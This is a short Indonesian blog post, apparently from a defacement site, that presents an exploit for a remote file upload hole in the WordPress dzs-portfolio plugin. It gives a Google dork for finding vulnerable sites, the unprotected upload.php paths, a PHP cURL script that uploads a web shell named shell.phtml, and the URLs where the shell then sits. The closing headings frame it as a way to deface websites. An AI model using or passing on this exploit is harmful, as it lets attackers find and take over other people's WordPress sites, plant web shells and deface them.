udah gausah basa basi, langsung saja -_-
# Exploit Title: WordPress dzs-portfolio Plugins Remote File Upload Vulnerability
# Google dork:inurl:/wp-content/plugins/dzs-portfolio/
# Tested on : Windows/Linux
# Vulnerability "upload.php" : "not" or "
not for direct access"Exploit :
/wp-content/plugins/dzs-portfolio/admin/upload.php
/wp-content/plugins/dzs-portfolio/upload.php
<?php
$uploadfile="shell.phtml";
$ch = curl_init("localhost/wp-content/plugins/dzs-portfolio/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";
?>
localhost/wp-content/plugins/dzs-portfolio/upload/shell.phtml
localhost/wp-content/plugins/dzs-portfolio/upload/admin/shell.phtml
Sekian dan terima kasih, Wassalamualaikum wr.wb
Deface dengan DZS Portfolio
Deface dengan Wordpress Portfolio
0 komentar:
Posting Komentar